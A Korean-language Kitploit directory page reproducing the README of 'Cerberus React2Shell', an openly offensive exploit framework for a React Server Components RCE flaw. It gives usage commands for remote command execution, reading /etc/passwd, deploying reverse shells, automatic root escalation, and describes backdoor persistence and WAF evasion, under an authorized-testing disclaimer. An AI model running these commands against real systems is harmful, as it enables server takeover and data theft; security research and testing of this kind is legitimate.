Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Cerberus-React2Shell-Scanner-Exploit — CVE-2025-55182(React Server Components RCE)를 위한 엘리트 익스플로잇 툴킷. 비동기 폴리모픽 페이로드, 고급 WAF/CDN 우회, 프록시 로테이션, Shodan/Censys 대량 스캔, 자동 펀 + 리버스 셸, Nuclei 템플릿, K8s 실습 환경 및 C2 대시보드. 작성자: Sudeepa Wanigarathna – 승인된 레드 팀 및 침투 테스트 전용. | Kitploit
도구/GitHubGitHub/cerberusmrxi/cerberus-react2shell-scanner-exploit
Penetration Testing FrameworksPrivilege EscalationVulnerability ScannersExploit FrameworksShellcodeWeb Application ExploitationPost-ExploitationCommand and ControlLearning & Education

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Red Teaming
Payload Development
Labs & Practice
GitHubcerberusmrxi/cerberus-react2shell-scanner-exploit

Cerberus-React2Shell-Scanner-Exploit

CVE-2025-55182(React Server Components RCE)를 위한 엘리트 익스플로잇 툴킷. 비동기 폴리모픽 페이로드, 고급 WAF/CDN 우회, 프록시 로테이션, Shodan/Censys 대량 스캔, 자동 펀 + 리버스 셸, Nuclei 템플릿, K8s 실습 환경 및 C2 대시보드. 작성자: Sudeepa Wanigarathna – 승인된 레드 팀 및 침투 테스트 전용.

저장소 보기
211개월 전아직 검토되지 않음

Cerberus React2Shell - 무기화된 익스플로잇 프레임워크

root@kitploit:~
  ██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗   ██╗
 ██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║   ██║
 ██║      █████╗  ██████╔╝██████╔╝█████╗  ██████╔╝██║   ██║
 ██║      ██╔══╝  ██╔══██╗██╔══██╗██╔══╝  ██╔══██╗██║   ██║
 ╚██████╗ ███████╗██║  ██║██████╔╝███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝
  
         React2Shell Exploitation Framework v1.0
              Author: Sudeepa Wanigarathna

🎯 개요

Next.js Server Actions RCE 취약점(React2Shell)을 위한 전문가급 익스플로잇 프레임워크입니다. 초기 접근부터 루트 권한 상승까지 완전한 공격 체인을 시연합니다.

기능:

  • ✅ 자동 취약점 탐지
  • ✅ 원격 코드 실행 (RCE)
  • ✅ 대화형 셸 접근
  • ✅ Linux 시스템 정보 수집
  • ✅ 자동 권한 상승
  • ✅ 리버스 셸 배포
  • ✅ 파일 업로드/다운로드
  • ✅ 루트 접근 시연

🚀 빠른 시작

기본 RCE

root@kitploit:~
# 취약점 확인
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# 명령 실행
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"

대화형 셸

root@kitploit:~
python3 interactive_shell.py --target http://127.0.0.1:3000

전체 자동 공격 체인

root@kitploit:~
# 전체 익스플로잇: RCE → 정보 수집 → 루트 접근
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

📁 프레임워크 구조

root@kitploit:~
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py      # 핵심 익스플로잇 엔진 (400+ 줄)
├── demo_exploit.py              # 자동 공격 체인 (290+ 줄)
├── interactive_shell.py         # 대화형 셸 (280+ 줄)
├── reverse_shell_handler.py     # 리버스 셸 리스너 (180+ 줄)
├── post_exploit/
│   ├── linux_enum.py           # 시스템 정보 수집 (330+ 줄)
│   ├── priv_esc.py             # 권한 상승 (320+ 줄)
│   └── __init__.py
├── EXPLOITATION_GUIDE.md        # 전체 사용 설명서
├── QUICKSTART.md                # 빠른 참조
└── BANNER.txt

🔥 기능

핵심 익스플로잇 엔진

  • Action ID 발견: JavaScript 번들에서 자동 추출
  • 다중 페이로드: execSync, spawn, eval, mainModule 변형
  • 출력 추출: 오류 응답에서 명령 출력 파싱
  • WAF 우회: 페이로드 난독화 기법

사후 익스플로잇

  • Linux 정보 수집: SUID/SGID 바이너리, 쓰기 가능한 경로, cron 작업, 커널 버전
  • 권한 상승: GTFOBins, 쓰기 가능한 /etc 파일, Docker 탈출, capabilities
  • 파일 작업: base64 인코딩으로 업로드/다운로드
  • 지속성: 다중 백도어 방법

대화형 도구

  • 대화형 셸: 내장 명령어로 실시간 명령 실행
  • 리버스 셸: 여러 셸 유형 (bash, python, nc, perl)
  • 데모 모드: 6단계 자동 데모

📖 사용 예제

1. 기본 명령어

root@kitploit:~
# 취약점 확인
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# 명령 실행
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"

# 다른 페이로드 변형
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn

# 난독화 사용
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate

2. 대화형 셸

root@kitploit:~
# 셸 실행
python3 interactive_shell.py --target http://127.0.0.1:3000

# 사용 가능한 명령어:
# - execute <cmd>        : 셸 명령 실행
# - enum                 : 전체 정보 수집 실행
# - escalate             : 권한 상승 시도
# - upload <local> <remote>  : 파일 업로드
# - download <remote> <local>: 파일 다운로드
# - shell <lhost> <lport>: 리버스 셸 배포
# - info                 : 세션 정보 표시
# - exit                 : 종료

3. 리버스 셸

root@kitploit:~
# 터미널 1: 리스너 시작
python3 reverse_shell_handler.py --lport 4444

# 터미널 2: 셸 배포
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
  --revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash

4. 자동 데모

root@kitploit:~
# 전체 체인: 탐지 → RCE → 정보 수집 → 루트
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

🎯 공격 체인

프레임워크는 완전한 6단계 익스플로잇 체인을 구현합니다:

  1. 발견 - JavaScript 번들에서 Server Action ID 추출
  2. 익스플로잇 - 작동하는 Action ID 찾기 및 RCE 달성
  3. 확인 - id 명령으로 코드 실행 확인
  4. 정보 수집 - 시스템 정보, SUID 바이너리, 쓰기 가능한 경로 수집
  5. 권한 상승 - 권한 상승 벡터 자동 익스플로잇
  6. 시연 - /etc/shadow 읽기 및 /root 목록화로 루트 접근 증명

🛡️ 권한 상승 기법

구현된 방법

  1. SUID 바이너리 (GTFOBins)

    • find, vim, python, perl, bash, awk, sed, less, more, nmap
  2. 쓰기 가능한 /etc 파일

    • /etc/passwd - 새 루트 사용자 추가
    • /etc/shadow - 루트 암호 제거
    • /etc/sudoers - NOPASSWD sudo 부여
  3. Docker 탈출

    • 접근 가능한 Docker 소켓 익스플로잇
    • 권한 있는 컨테이너 탈출
  4. 커널 익스플로잇

    • DirtyCow (CVE-2016-5195)
    • Dirty Pipe (CVE-2022-0847)
    • PwnKit (CVE-2021-4034)
  5. Linux Capabilities

    • CAP_SETUID, CAP_DAC_OVERRIDE 익스플로잇

📊 통계

  • 총 코드 줄 수: 1,800+
  • 모듈: 8
  • 권한 상승 기법: 5
  • 페이로드 변형: 4
  • 셸 유형: 4 (bash, python, nc, perl)

⚙️ 요구 사항

root@kitploit:~
pip install -r requirements.txt

종속성:

  • requests
  • colorama

📚 문서

  • EXPLOITATION_GUIDE.md - 예제가 포함된 전체 사용 가이드
  • QUICKSTART.md - 일반 명령어에 대한 빠른 참조

⚠️ 면책 조항

경고: 이 도구는 공인된 보안 테스트 전용입니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 소유한 시스템이나 명시적인 서면 허가를 받은 시스템에서만 사용하십시오.

저자는 이 도구의 오용에 대해 책임지지 않습니다. 사용에 따른 위험은 본인이 감수해야 합니다.

🎓 교육 목적

이 프레임워크는 다음을 위해 설계되었습니다:

  • Next.js 취약점을 연구하는 보안 연구자
  • 권한을 보유한 침투 테스터
  • 보안 교육 및 CTF 문제
  • 통제된 실험실 환경에서의 취약점 연구

📄 라이선스

MIT 라이선스 (교육 목적 전용)

👤 저자

Sudeepa Wanigarathna

  • 익스플로잇 개발 전문가
  • 보안 연구원
  • 침투 테스터

버전: 1.0
마지막 업데이트: 2025년 12월
실험실 상태: http://127.0.0.1:3000 (실행 중)

자세한 사용 방법은 EXPLOITATION_GUIDE.md를 참조하십시오.

도구 다운로드